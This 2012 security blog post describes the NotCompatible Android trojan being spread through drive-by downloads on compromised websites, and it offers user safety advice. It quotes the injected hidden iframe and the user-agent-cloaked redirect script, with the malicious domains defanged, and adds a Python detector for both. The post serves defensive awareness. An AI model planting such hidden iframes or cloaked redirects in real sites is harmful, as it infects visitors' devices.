Thursday, May 3, 2012

Compromised Sites Serving Android Malware via Drive-by-Downloads

Drive-by-Downloads Targeting Android

Compromised websites serving drive-by-downloads that target PCs are nothing new.

The risk of encountering malware is always present due to the simple fact that cybercriminals often hack websites and inject malicious code that will attempt to exploit system vulnerabilities within visiting machines in order to silently install malware.

Because of this, we’ve warned in the past that a casual internet browsing session can easily lead to a malware infection, regardless of which computer operating system you use.

But what about drive-by-downloads targeting mobile users?

It’s no secret that cybercrooks have taken a shine to creating mobile malware targeting the popular Android OS, although those are usually spread via unofficial Android marketplaces and third-party sites. Heck, some have even managed to sneak into the official Android Market (aka Google Play Store).

So, I guess it was only a matter of time before the bad guys began delivering Android malware using sites rigged with drive-by-downloads. And unfortunately, that time has come.

LookOut Mobile Security posted an alert on Wednesday, warning users of a new Android Trojan called “NotCompatible” that is being delivered via drive-by-downloads on compromised websites.

NotCompatible appears to serve as a simple TCP relay/proxy and although it doesn’t cause direct harm to the target device, it could “potentially be used to gain illicit access to private networks by turning the infected Android device into a proxy.”

The drive-by-download attack works like any other. Once a user visits a hacked site using their Android device, the NotCompatible application (filename “Update.apk”) will automatically be downloaded.

There is some good news, though. In order for the malicious app to be installed, the following conditions must be fulfilled:

  1. The “Unknown Sources” setting to allow installation of non-Market apps must be enabled. (The feature is also known as “sideloading.”)

  2. The user must agree to install the application.


If these requirements are not met, the attack will fail. So make sure you have left that “Unknown Sources” setting unchecked and you don’t go click-happy when prompted to install apps you don’t recall downloading.

LookOut reported that the following code is found at the bottom of infected sites serving NotCompatible:

<iframe
style="visibility: hidden; display: none; display: none;"
src="hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}"></iframe>


Interestingly enough, if a PC-based browser accesses the site at “gaoanalitics.info,” a “not found” error is returned. It is only when a browser with the word “Android” in its user-agent header requests the page that the following code is returned, which redirects the browser and triggers the malicious app download:

<html><head></head><body><script type="text/javascript">window.top.location.href = "hxxp://androidonlinefix.info/fix1.php";</script></body></html>
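Both indicators from the alert, the hidden off-site iframe injected into a compromised page and the Android-only redirect body, can be checked for in HTML you have already fetched. The following Python script is an added example written for this post, not code from LookOut or from the post itself; it assumes you pass the inspected page's hostname yourself, and its sample inputs are constructed from the two snippets quoted above.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# CSS that hides an element, as used on the injected iframe.
HIDDEN_CSS = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)
# Script that sends the top-level window elsewhere, as in the Android-only response.
TOP_REDIRECT = re.compile(
    r"window\.top\.location(?:\.href)?\s*=\s*['\"]([^'\"]+)['\"]", re.I)


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> in an HTML document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append(dict(attrs))


def hidden_external_iframes(html, page_host):
    """Return the src of each iframe that is hidden by CSS and points off-site.
    page_host is the hostname of the page being inspected (supplied by the caller)."""
    parser = IframeCollector()
    parser.feed(html)
    hits = []
    for attrs in parser.iframes:
        style, src = attrs.get("style") or "", attrs.get("src") or ""
        host = urlparse(src).hostname
        if HIDDEN_CSS.search(style) and host and host != page_host:
            hits.append(src)
    return hits


def redirect_target(body):
    """Return the URL a window.top.location redirect points to, or None."""
    match = TOP_REDIRECT.search(body)
    return match.group(1) if match else None


# Constructed sample: a benign page with the injected iframe from the alert appended.
SAMPLE_PAGE = ('<html><body><p>Welcome</p><iframe style="visibility: hidden; '
               'display: none; display: none;" src="hxxp://gaoanalitics.info/'
               '?id={1234567890-0000-DEAD-BEEF-133713371337}"></iframe></body></html>')
# Constructed sample: the body served only when the user agent contains "Android".
SAMPLE_ANDROID_RESPONSE = ('<html><head></head><body><script type="text/javascript">'
                           'window.top.location.href = "hxxp://androidonlinefix.info/'
                           'fix1.php";</script></body></html>')
```

Fetching the same URL once with a desktop user agent and once with an Android one and running `redirect_target` over each body is a cheap way to spot the user-agent cloaking the post describes.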

LookOut is still investigating the number of infected sites and the suspicious applications being served, but so far the sites that have been hit appear to have relatively low traffic. That's not to say the crooks behind this won't go after bigger game.

Stay safe, Android users!

